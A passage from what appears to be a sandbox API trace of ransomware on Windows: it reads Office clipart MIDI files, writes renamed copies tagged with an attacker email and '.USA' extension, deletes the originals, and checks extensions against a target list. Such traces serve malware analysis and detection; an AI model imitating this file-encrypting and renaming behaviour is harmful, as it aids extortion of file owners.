office\\clipart\\pub60cor\\htech_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0267.640] GetLastError () returned 0x0 [0267.640] ReadFile (in: hFile=0x37c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x1c0a, lpOverlapped=0x0) returned 1 [0267.642] WriteFile (in: hFile=0x384, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x1c10, lpOverlapped=0x0) returned 1 [0267.643] ReadFile (in: hFile=0x37c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.643] WriteFile (in: hFile=0x384, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.643] SetEndOfFile (hFile=0x384) returned 1 [0267.643] CloseHandle (hObject=0x384) returned 1 [0267.643] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.643] SetEndOfFile (hFile=0x37c) returned 1 [0267.645] CloseHandle (hObject=0x37c) returned 1 [0267.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.645] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid")) returned 1 [0267.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0267.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0267.645] lstrlenW (lpString=".doc") returned 4 [0267.645] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.645] lstrlenW (lpString=".docx") returned 5 [0267.646] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.646] lstrlenW (lpString=".pdf") returned 4 [0267.646] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.646] lstrlenW (lpString=".xls") returned 4 [0267.646] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.646] lstrlenW (lpString=".xlsx") returned 5 [0267.646] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.646] lstrlenW (lpString=".ppt") returned 4 [0267.646] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0267.646] lstrlenW (lpString=".zip") returned 4 [0267.646] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.646] lstrlenW (lpString=".rar") returned 4 [0267.646] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.646] lstrlenW (lpString=".bz2") returned 4 [0267.646] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.646] lstrlenW (lpString=".7z") returned 3 [0267.646] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0267.646] lstrlenW (lpString=".dbf") returned 4 [0267.646] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0267.646] lstrlenW (lpString=".1cd") returned 4 [0267.646] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0267.646] lstrlenW (lpString=".jpg") returned 4 [0267.646] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0267.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0267.647] lstrlenW (lpString=".doc") returned 4 [0267.647] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.647] lstrlenW (lpString=".docx") returned 5 [0267.647] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.647] lstrlenW (lpString=".pdf") returned 4 [0267.647] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.647] lstrlenW (lpString=".xls") returned 4 [0267.647] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.647] lstrlenW (lpString=".xlsx") returned 5 [0267.647] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.647] lstrlenW (lpString=".ppt") returned 4 [0267.647] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0267.647] lstrlenW (lpString=".zip") returned 4 [0267.647] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.647] lstrlenW (lpString=".rar") returned 4 [0267.647] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.647] lstrlenW (lpString=".bz2") returned 4 [0267.647] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.647] lstrlenW (lpString=".7z") returned 3 [0267.647] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0267.647] lstrlenW (lpString=".dbf") returned 4 [0267.648] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0267.648] lstrlenW (lpString=".1cd") returned 4 [0267.648] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0267.648] lstrlenW (lpString=".jpg") returned 4 [0267.648] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.648] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0267.648] lstrlenW (lpString="INDST_01.MID") returned 12 [0267.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.800] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=8568) returned 1 [0267.800] CloseHandle (hObject=0x328) returned 1 [0267.800] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid")) returned 0x20 [0267.980] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0268.246] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.246] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.260] GetLastError () returned 0x0 [0268.260] ReadFile (in: hFile=0x38c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x2178, lpOverlapped=0x0) returned 1 [0268.262] WriteFile (in: hFile=0x348, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x2180, lpOverlapped=0x0) returned 1 [0268.263] ReadFile (in: hFile=0x38c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.263] WriteFile (in: hFile=0x348, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.263] SetEndOfFile (hFile=0x348) returned 1 [0268.263] CloseHandle (hObject=0x348) returned 1 [0268.263] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.263] SetEndOfFile (hFile=0x38c) returned 1 [0268.266] CloseHandle (hObject=0x38c) returned 1 [0268.266] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.274] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid")) returned 1 [0268.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0268.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0268.275] lstrlenW (lpString=".doc") returned 4 [0268.275] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.275] lstrlenW (lpString=".docx") returned 5 [0268.275] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.275] lstrlenW (lpString=".pdf") returned 4 [0268.275] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.275] lstrlenW (lpString=".xls") returned 4 [0268.275] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.275] lstrlenW (lpString=".xlsx") returned 5 [0268.275] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.275] lstrlenW (lpString=".ppt") returned 4 [0268.275] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0268.275] lstrlenW (lpString=".zip") returned 4 [0268.275] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.275] lstrlenW (lpString=".rar") returned 4 [0268.275] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.275] lstrlenW (lpString=".bz2") returned 4 [0268.275] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.275] lstrlenW (lpString=".7z") returned 3 [0268.275] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0268.275] lstrlenW (lpString=".dbf") returned 4 [0268.275] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0268.275] lstrlenW (lpString=".1cd") returned 4 [0268.275] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0268.276] lstrlenW (lpString=".jpg") returned 4 [0268.276] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0268.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0268.276] lstrlenW (lpString=".doc") returned 4 [0268.276] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.276] lstrlenW (lpString=".docx") returned 5 [0268.276] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.276] lstrlenW (lpString=".pdf") returned 4 [0268.276] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.276] lstrlenW (lpString=".xls") returned 4 [0268.276] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.276] lstrlenW (lpString=".xlsx") returned 5 [0268.276] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.276] lstrlenW (lpString=".ppt") returned 4 [0268.276] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0268.276] lstrlenW (lpString=".zip") returned 4 [0268.276] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.276] lstrlenW (lpString=".rar") returned 4 [0268.276] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.276] lstrlenW (lpString=".bz2") returned 4 [0268.276] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.276] lstrlenW (lpString=".7z") returned 3 [0268.276] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0268.276] lstrlenW (lpString=".dbf") returned 4 [0268.277] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0268.277] lstrlenW (lpString=".1cd") returned 4 [0268.277] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0268.277] lstrlenW (lpString=".jpg") returned 4 [0268.277] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.277] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.277] lstrlenW (lpString="OCEAN_01.MID") returned 12 [0268.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.279] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=5440) returned 1 [0268.279] CloseHandle (hObject=0x37c) returned 1 [0268.279] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid")) returned 0x20 [0268.279] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.279] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.279] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.280] GetLastError () returned 0x0 [0268.280] ReadFile (in: hFile=0x37c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x1540, lpOverlapped=0x0) returned 1 [0268.283] WriteFile (in: hFile=0x390, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x1550, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x1550, lpOverlapped=0x0) returned 1 [0268.283] ReadFile (in: hFile=0x37c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.283] WriteFile (in: hFile=0x390, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.283] SetEndOfFile (hFile=0x390) returned 1 [0268.283] CloseHandle (hObject=0x390) returned 1 [0268.284] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.284] SetEndOfFile (hFile=0x37c) returned 1 [0268.286] CloseHandle (hObject=0x37c) returned 1 [0268.286] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.286] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid")) returned 1 [0268.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0268.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0268.286] lstrlenW (lpString=".doc") returned 4 [0268.287] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.287] lstrlenW (lpString=".docx") returned 5 [0268.287] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.287] lstrlenW (lpString=".pdf") returned 4 [0268.287] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.287] lstrlenW (lpString=".xls") returned 4 [0268.287] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.287] lstrlenW (lpString=".xlsx") returned 5 [0268.287] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.287] lstrlenW (lpString=".ppt") returned 4 [0268.287] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0268.287] lstrlenW (lpString=".zip") returned 4 [0268.287] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.287] lstrlenW (lpString=".rar") returned 4 [0268.287] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.287] lstrlenW (lpString=".bz2") returned 4 [0268.287] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.287] lstrlenW (lpString=".7z") returned 3 [0268.287] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0268.287] lstrlenW (lpString=".dbf") returned 4 [0268.287] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0268.287] lstrlenW (lpString=".1cd") returned 4 [0268.287] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0268.287] lstrlenW (lpString=".jpg") returned 4 [0268.287] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0268.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0268.288] lstrlenW (lpString=".doc") returned 4 [0268.288] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.288] lstrlenW (lpString=".docx") returned 5 [0268.288] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.288] lstrlenW (lpString=".pdf") returned 4 [0268.288] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.288] lstrlenW (lpString=".xls") returned 4 [0268.288] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.288] lstrlenW (lpString=".xlsx") returned 5 [0268.288] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.288] lstrlenW (lpString=".ppt") returned 4 [0268.288] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0268.288] lstrlenW (lpString=".zip") returned 4 [0268.288] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.288] lstrlenW (lpString=".rar") returned 4 [0268.288] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.288] lstrlenW (lpString=".bz2") returned 4 [0268.288] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.288] lstrlenW (lpString=".7z") returned 3 [0268.288] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0268.288] lstrlenW (lpString=".dbf") returned 4 [0268.288] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0268.288] lstrlenW (lpString=".1cd") returned 4 [0268.288] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0268.288] lstrlenW (lpString=".jpg") returned 4 [0268.289] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.289] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.289] lstrlenW (lpString="OUTDR_01.MID") returned 12 [0268.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.292] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=6644) returned 1 [0268.292] CloseHandle (hObject=0x37c) returned 1 [0268.292] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid")) returned 0x20 [0268.292] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.292] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.292] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.293] GetLastError () returned 0x0 [0268.293] ReadFile (in: hFile=0x37c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x19f4, lpOverlapped=0x0) returned 1 [0268.295] WriteFile (in: hFile=0x390, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x1a00, lpOverlapped=0x0) returned 